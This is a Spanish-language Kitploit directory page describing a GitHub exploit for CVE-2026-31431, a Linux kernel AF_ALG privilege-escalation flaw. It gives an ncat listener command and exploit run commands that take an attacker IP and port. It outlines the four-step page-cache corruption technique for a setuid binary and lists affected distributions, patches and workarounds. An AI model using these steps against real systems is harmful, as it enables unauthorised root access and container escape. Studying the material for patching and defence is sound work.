Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-31431-RCE-Exploit — Exploit de escalada de privilegios local para CVE-2026-31431, una falla lógica en AF_ALG del kernel de Linux que permite a usuarios no privilegiados escribir 4 bytes en la caché de páginas y obtener acceso root. Incluye script PoC y guía de mitigación. | Kitploit
Herramientas/GitHubGitHub/m4xsec/cve-2026-31431-rce-exploit
Escalada de PrivilegiosFrameworks de ExploitsAnálisis de VulnerabilidadesExplotaciónRed TeamingEscape de ContenedoresExplotación de Binarios
GitHubm4xsec/cve-2026-31431-rce-exploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-31431-RCE-Exploit

Exploit de escalada de privilegios local para CVE-2026-31431, una falla lógica en AF_ALG del kernel de Linux que permite a usuarios no privilegiados escribir 4 bytes en la caché de páginas y obtener acceso root. Incluye script PoC y guía de mitigación.

Ver Repositorio
72hace 3 mesesAún no revisado

🔴 CVE-2026-31431 — "Copy Fail"

Un fallo lógico del kernel de Linux de 9 años que otorga acceso root en segundos

CVE CVSS Kernel Since


Resumen

Copy Fail es una vulnerabilidad de escalada de privilegios local (LPE) de alta severidad en el subsistema criptográfico del kernel de Linux (algif_aead). Descubierta y divulgada por Theori (a través de su herramienta de investigación de vulnerabilidades asistida por IA Xint Code) el 29 de abril de 2026, el fallo permite a cualquier usuario local sin privilegios escribir 4 bytes controlados en la caché de páginas de cualquier archivo legible — y aprovecharlo para obtener root en prácticamente todas las distribuciones principales de Linux lanzadas desde 2017.

Un exploit de prueba de concepto funcional tiene solo ~732 bytes de Python.


Explotación

  1. Iniciar el listener de Ncat
root@kitploit:~
sudo ncat -lvnp PUERTO
  1. Ejecutar el exploit en la máquina objetivo
root@kitploit:~
# Usando el script de Python
python3 CVE-2026-31431-Exploit.py IP PUERTO

# Binario compilado
chmod +x CVE-2026-31431-Exploit
./CVE-2026-31431-Exploit IP PUERTO

🧬 Resumen técnico

Cómo funciona el exploit (4 pasos)

  1. Abrir un socket AF_ALG y vincularlo a authencesn(hmac(sha256),cbc(aes))
  2. Hacer splice de las páginas de un binario setuid legible al socket
  3. La escritura temporal (scratch) AEAD del kernel sobrescribe 4 bytes en la caché de páginas de ese binario
  4. Ejecutar el binario setuid ahora corrupto → shell root

Por qué es peligroso

  • Sin ventana de carrera — determinista, funciona siempre
  • Sin necesidad de offset del kernel / bypass de KASLR
  • El mismo exploit funciona en todas las distribuciones — Ubuntu, RHEL, Amazon Linux, SUSE, Rocky, etc.
  • Escape de contenedores — la caché de páginas es compartida; una escritura desde dentro de un contenedor afecta al host
  • Sin modificación en disco — los monitores de integridad de archivos (AIDE, OSSEC, etc.) no lo detectarán
  • Sin rastro forense en disco

🎯 Versiones afectadas

Distribuciones vulnerables confirmadas

  • Ubuntu 24.04 LTS
  • Amazon Linux 2023
  • RHEL 10.1
  • SUSE 16
  • Rocky Linux 9.7

Esencialmente todas las distribuciones principales de Linux lanzadas desde 2017 están afectadas.


🛡️ Mitigación

1. Parche (recomendado)

Actualice su kernel a una versión que contenga el commit de corrección fafe0fa2995a. La mayoría de las distribuciones principales han lanzado o están lanzando paquetes de kernel actualizados.

2. Soluciones temporales

Si no puede parchear de inmediato:

  • Bloquear la creación de sockets AF_ALG mediante una política seccomp
  • Poner en lista negra el módulo algif_aead:
    root@kitploit:~
    echo "blacklist algif_aead" | sudo tee /etc/modprobe.d/disable-algif-aead.conf
    sudo modprobe -r algif_aead 2>/dev/null
    

⚠️ Aviso legal

Este repositorio es solo para fines educativos y defensivos. La información aquí contenida tiene como objetivo ayudar a los equipos de seguridad a comprender, detectar y mitigar CVE-2026-31431. Siga siempre las prácticas de divulgación responsable y las leyes aplicables.


⭐ Marque este repositorio con una estrella para mantenerse actualizado sobre parches y guías de detección.

Descargar herramienta
CampoDetalle
ID CVECVE-2026-31431
Puntuación CVSS7.8 (ALTA)
TipoEscalada de privilegios local (LPE)
Componentealgif_aead — interfaz criptográfica AF_ALG del kernel de Linux en espacio de usuario
Causa raízFallo lógico en la plantilla AEAD authencesn; una optimización in-place (commit 72548b093ee3, ago 2017) hace que las páginas de la caché de páginas aparezcan en la lista dispersa (scatterlist) de destino escribible del kernel
PrimitivaEscritura controlada de 4 bytes en la caché de páginas de cualquier archivo legible
Mecanismo del exploitSocket AF_ALG → splice() → corrupción de la caché de páginas de un binario setuid → root
¿Condición de carrera?❌ Ninguna — fallo lógico directo, 100 % fiable
¿Se necesita offset del kernel?❌ No
Commit de correcciónfafe0fa2995a (revierte la optimización de 2017)
AfectadasNo afectadas
Kernel de Linux 4.14 hasta 7.0-rcKernels anteriores a 4.14 (antes del commit de ago 2017)
Todas las 6.18.x anteriores a 6.18.226.18.22+ (parcheadas)
Todas las 6.19.x anteriores a 6.19.126.19.12+ (parcheadas)